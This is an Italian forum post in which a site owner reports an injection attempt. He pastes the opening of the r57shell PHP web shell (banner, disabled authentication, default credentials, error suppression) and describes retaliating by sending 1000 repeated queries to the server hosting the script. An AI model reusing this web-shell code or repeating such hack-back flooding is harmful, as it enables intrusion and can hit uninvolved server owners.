• User Attivo

    Come far desistere i cretini

    Stasera ho beccato in diretta un cretino che si divertiva a querarmi un sito con una cosetta non tanto innocente (injection xsl ) , probabilmente un russo anche se lo script era su un server americano (http://XXXXXXXXXX.com/sc/comandi/r57.txt)...

    vi faccio vedere solo l'inizio

    <?php
    /******************************************************************************************************/
    /*
    /*                                     #    #        #    #                             
    /*                                     #   #          #   #
    /*                                    #    #          #    #
    /*                                    #   ##   ####   ##   #
    /*                                   ##   ##  ######  ##   ##
    /*                                   ##   ##  ######  ##   ##
    /*                                   ##   ##   ####   ##   ##
    /*                                   ###   ############   ###
    /*                                   ########################
    /*                                        ##############
    /*                                 ######## ########## #######
    /*                                ###   ##  ##########  ##   ###
    /*                                ###   ##  ##########  ##   ###
    /*                                 ###   #  ##########  #   ###
    /*                                 ###   ##  ########  ##   ###
    /*                                  ##    #   ######   #    ##
    /*                                   ##   #    ####   #    ##
    /*                                     ##                 ##
    /*
    /*
    /*
    /*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
    /*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
    /*  ??????: 1.31
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    /*  ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
    /*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
    /*  ?? [email protected]. ??? ??????????? ????? ???????????. 
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    /*  (c)oded by 1dt.w0lf
    /*  RST/GHC http://rst.void.ru , http://ghc.ru
    /*  ANY MODIFIED REPUBLISHING IS RESTRICTED
    /******************************************************************************************************/
    /* ~~~ ????????? | Options  ~~~ */
    
    // ????? ????? | Language
    // $language='ru' - ??????? (russian)
    // $language='eng' - english (??????????)
    $language='eng';
    
    // ?????????????? | Authentification
    // $auth = 1; - ?????????????? ????????  ( authentification = On  )
    // $auth = 0; - ?????????????? ????????? ( authentification = Off )
    $auth = 0; 
    
    // ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
    // ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
    // ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57'
    // Login & password crypted with md5, default is 'r57'
    $name='ec371748dc2da624b35a4f8f685dd122'; // ????? ????????????  (user login)
    $pass='ec371748dc2da624b35a4f8f685dd122'; // ?????? ???????????? (user password)
    /******************************************************************************************************/
    error_reporting(0);
    set_magic_quotes_runtime(0);
    @set_time_limit(0);
    @ini_set('max_execution_time',0);
    @ini_set('output_buffering',0);
    $safe_mode = @ini_get('safe_mode');
    $version = '1.31';
    if(version_compare(phpversion(), '4.1.0') == -1)
     {
     $_POST   = &$HTTP_POST_VARS;
     $_GET    = &$HTTP_GET_VARS;
     $_SERVER = &$HTTP_SERVER_VARS;
     $_COOKIE = &$HTTP_COOKIE_VARS;
     }
    if (@get_magic_quotes_gpc())
     {
     foreach ($_POST as $k=>$v)
      {
      $_POST[$k] = stripslashes($v);
      }
     foreach ($_COOKIE as $k=>$v)
      {
      $_COOKIE[$k] = stripslashes($v);
      } 
     }
    
    if($auth == 1) {
    if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
       {
       header('WWW-Authenticate: Basic realm="r57shell"');
       header('HTTP/1.0 401 Unauthorized');
       exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
       }
    }   
    $head = '<!-- ??????????, ???? -->
    <html>
    <head>
    <title>r57shell</title>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    
    <STYLE>
    tr {
    BORDER-RIGHT:  #aaaaaa 1px solid;
    BORDER-TOP:    #eeeeee 1px solid;
    BORDER-LEFT:   1px solid;
    BORDER-BOTTOM: 1px solid;
    color: #000000;
    }
    td {
    BORDER-RIGHT:  1px solid;
    BORDER-TOP:    1px solid;
    BORDER-LEFT:   1px solid;
    BORDER-BOTTOM: 1px solid;
    color:;
    }
    
    ```ect ect, questo sarà un ventesimo della lunghezza reale dello script
    
    
    al di la che non mi avrebbe fatto altro danno che consumare un pò di banda ho deciso di far capire all'emerito che mi stava stufando, ho rigirato la stessa query al sito, dal cui server arrivava, moltiplicandola per 1000 ripetizioni con variabili di query cambiate ad ogni ripetizione pur sapendo che non avrebbero avuto effetti dannosi, poi alla fine gliene ho aggiunte una ventina così formulate http://**XXXXXXXXXX**.com/sc/comandi/r57.txt_attention_that_trying_finds_the_bad 
    
    Al 99% il sito e il legittimo proprietario del server non sanno nulla dello script malefico (il bello è che ha pure il copyrigth :lol:) che si trovano in una cartella, quasi sicuramente, tanto più che si tratta di un fornitore di connessione wireless, qualcuno facendo driving wireless ha trasformato quel server in zombie.
    Con la mia pacifica azione ho ottenuto due scopi, primo il cretino deve essersi accorto e ha terminato di rompere le scatole, secondo il gestore del sito o il sysadmin del server probabilmente troverà nei log le mie query e leggendo l'avvertimento capirà che c'è qualcosa che non va.
    
    Ho pensato di descrivervi la cosa per darvi un'idea sommaria di cosa si può fare di utile a se e agli altri senza scendere a livelli animali, anche perchè poi si colpirebbe al 99% chi non c'entra nulla.
    Spero vi sia di esempio per rendere il web almeno un pò più eticamente corretto.
    
    Posso dirvi che ci sono più pc zombie in giro di quello che si possa immaginare e non tutti sono server, spesso sono pc privati, alcuni persino con ip dinamico che si collega a noip (o simili) e con un server web trasparente al proprietario del pc.
    Siete responsabili, almeno moralmente, se il vostro pc fa danni in giro.
    :ciauz:
     
    
    
    **XXXXXXXXXX = **ho mascherato il reale indirizzo del server onde evitare che a qualcuno leggendo qui non venisse in mente qualche idea poco intelligente

  • Consiglio Direttivo

    Ciao Uno,

    grazie per aver riportato la tua esperienza! 🙂

    :ciauz: